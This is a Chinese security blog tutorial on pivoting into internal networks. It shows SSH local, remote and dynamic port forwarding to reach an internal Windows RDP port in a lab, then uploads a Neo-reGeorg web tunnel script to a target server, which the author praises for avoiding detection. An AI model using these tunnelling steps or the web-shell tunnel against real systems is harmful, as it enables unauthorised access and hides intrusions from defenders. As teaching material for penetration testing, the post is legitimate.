<p>（1）本地转发<br><img src="https://img-blog.csdnimg.cn/20210508144037174.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>测试目标：跳板机为跳板访问windows2008  3389端口<br>将内网windows主机3389端口映射到攻击机本地端口上。在访问这个本地端口就可以访问目标机的3389端口了<br>攻击执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh -CfNg -L 1111:10.10.10.30:3389 root@192.168.43.37<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508144532744.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>这里要输入跳板机的登录密码<br>成功之后查看本地1111端口是否已经连接：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">netstat -tulnp | grep <span class="hljs-string">&quot;1111&quot;</span><br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508144731680.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>在kali中执行 rdesktop 127.0.0.1:1111<br><img src="https://img-blog.csdnimg.cn/20210508144819413.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>映射成功</p>
<p>ssh本地端口映射可以将本地(客户机)的某个端口转发到远端指定机器的指定端口；本地端口转发则是在本地(客户机)监听一个端口，所有访问这个端口的数据都会通过ssh隧道传输到远端的对应端口。</p>
<p>（2)远程转发</p>
<p><img src="https://img-blog.csdnimg.cn/20210508145642940.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>web服务器中执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh -CfNg -R 3333:10.10.10.30:3389 root@192.168.43.254<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508145906561.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>kali中输入  redesktop 127.0.0.1:3333<br><img src="https://img-blog.csdnimg.cn/20210508150047952.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>成功建立连接</p>
<p>本地端口转发是将远程主机某个端口的数据转发到本地机器的指定端口。远程端口转发则是在远程主机上监听一个端口，所有访问这个远程服务器指定端口的数据都会通过ssh隧道传输到本地的对应端口。</p>
<p>（3）动态转发<br><img src="https://img-blog.csdnimg.cn/20210508152101186.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>在kali中执行如下命令，建立一个动态的socks 4&#x2F;5代理通道</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh -CfNg -D 7000 root@192.168.43.37<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508152228596.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>成功后配置proxychains</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">vi /etc/proxychains.conf<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508152329188.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210508153409376.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>成功访问到内网主机</p>
<p>动态端口映射就是建立一个ssh加密的socks 4&#x2F;5代理通道。任何支持 socks 4&#x2F;5协议的程序都可以使用这个加密通道进行代理访问。</p>
<p><strong>2.4 HTTP&#x2F;HTTPS协议</strong><br>HTTP Service代理用于将所有的流量转发到内网。常见的代理工具有reGeorg,meterpreter,tunna等</p>
<ul>
<li>reGeorg<br>reGeorg支持ASPX,PHP,JSP等web脚本，并提供了一个Tomcat5版本。<br>这里使用Neo-reGeorg是大佬改版的reGeorg。<br>它的优势是做了加密处理，避免特征检测，生成的脚本也免杀！！</li>
</ul>
<p>实验环境：</p>
<p><img src="https://img-blog.csdnimg.cn/20210510145053711.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>首先先生成加密脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python .\neoreg.py generate -k one<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210509000148936.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>将相应脚本文件上传到目标服务器上<br><img src="https://img-blog.csdnimg.cn/2021050900051045.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>攻击上运行进行隧道建立</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python neoreg.py -k one -u http://192.168.43.58/tunnel.php<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210510144725669.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>成功建立的连接<br>配置本地代理</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">vi /etc/proxychains.conf<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210510145217247.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>测试与目标机连通<br><img src="https://img-blog.csdnimg.cn/20210510145321116.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" class="category-chain-item">内网安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">#内网安全</a>
      
        <a href="/tags/%E9%9A%A7%E9%81%93%E9%9A%90%E8%97%8F/">#隧道隐藏</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>内网隧道隐藏</div>
      <div>http://idea-oss.github.io/2022/06/15/内网隧道隐藏/内网隧道隐藏/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>iDea</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年6月15日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/06/15/%E5%86%85%E7%BD%91%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96/%E5%86%85%E7%BD%91%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96/" title="内网密码抓取">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">内网密码抓取</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/06/15/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/" title="内网穿透">
                        <span class="hidden-mobile">内网穿透</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.4.18/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"0mPxzRPwogk31Fn10hTPyb1K-gzGzoHsz","appKey":"BUzND1EWjf6LGVsgj979UcGb","path":"window.location.pathname","placeholder":"说点什么吧","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":false,"serverURLs":"https://0mpxzrpw.lc-cn-n1-shared.com","emojiCDN":null,"emojiMaps":null,"enableQQ":null},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>可乐</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>不乐</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  

  

  

  

  

  

  




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
